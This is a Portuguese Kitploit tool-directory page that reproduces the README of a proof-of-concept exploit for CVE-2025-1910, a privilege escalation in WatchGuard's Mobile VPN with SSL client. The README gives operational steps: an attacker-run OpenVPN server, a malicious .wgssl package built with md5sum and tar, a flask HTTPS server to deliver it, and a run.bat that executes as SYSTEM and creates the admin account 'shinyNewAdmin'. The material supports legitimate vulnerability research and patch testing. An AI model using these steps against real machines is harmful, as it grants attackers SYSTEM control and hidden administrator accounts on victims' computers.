Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1910-WatchGuard-Privilege-Escalation — Prova de conceito para explorar a CVE-2025-1910, uma elevação de privilégio local no cliente Mobile VPN with SSL da Watchguard. | Kitploit
Ferramentas/GitHubGitHub/lutrasecurity/cve-2025-1910-watchguard-privilege-escalation
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoMovimento LateralPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHublutrasecurity/cve-2025-1910-watchguard-privilege-escalation

CVE-2025-1910-WatchGuard-Privilege-Escalation

Prova de conceito para explorar a CVE-2025-1910, uma elevação de privilégio local no cliente Mobile VPN with SSL da Watchguard.

Ver Repositório
13há 8 mesesAinda não revisado

Escalação de Privilégios no Cliente WatchGuard Mobile VPN with SSL (CVE-2025-1910)

Uma vulnerabilidade de escalação de privilégios no Mobile VPN with SSL da WatchGuard <= 12.11.2 permite que um usuário de baixo privilégio execute comandos como SYSTEM no cliente. Testado com o Mobile VPN with SSL versão 12.11.2.

Para mais detalhes, consulte nosso artigo do blog (versão em alemão).

Exploração

Preparação no Servidor do Atacante

  1. Inicie um servidor OpenVPN que aceite todas as conexões:
sudo openvpn --config server.conf

Servidor OpenVPN iniciado.

  1. Modifique a opção remote em ./client/client.ovpn para apontar para o servidor OpenVPN

  2. Modifique ./client/run.bat conforme sua preferência; este script será executado como SYSTEM. Por padrão, um novo usuário administrador é criado (shinyNewAdmin)

  3. Crie o arquivo malicioso client.wgssl do WatchGuard:

cd client/

# Create checksum
md5sum client.ovpn run.bat > MD5SUM

# Pack into a .wgssl file
tar -czf ../client_exploit.wgssl client.ovpn  MD5SUM  run.bat

cd ..
  1. Sirva o arquivo malicioso client.wgssl via flask:
# Start the flask HTTPS server
sudo python3 srv.py

Servidor web flask iniciado.

Opcionalmente, um novo par de certificado e chave pode ser criado via openssl:

# Create certificate and private key for the HTTPS connection
openssl req -x509 -newkey rsa:4096 -nodes -out server.crt -keyout server.key -days 365 -subj "/CN=firebox"

Exploração na Máquina da Vítima

Em seguida, na máquina da vítima onde uma versão vulnerável do Mobile VPN with SSL está instalada (por exemplo, versão 12.11.2, Download), tente conectar-se ao servidor do atacante. O nome de usuário e a senha informados não importam:

Conectando ao servidor do atacante.

Clique em Sim no alerta de segurança para ignorar os avisos de certificado:

Conectando ao servidor do atacante.

Após a conexão ser estabelecida com sucesso, o arquivo run.bat é executado e o usuário shinyNewAdmin é criado:

O usuário shinyNewAdmin foi criado.

Configuração

No servidor do atacante, você precisa ter Python, openssl e openvpn instalados. Além disso, o pacote Python flask precisa ser instalado:

pip install -r requirements.txt

Nix Flake

Com o Nix instalado, você pode simplesmente iniciar o shell de desenvolvimento:

nix develop
Baixar ferramenta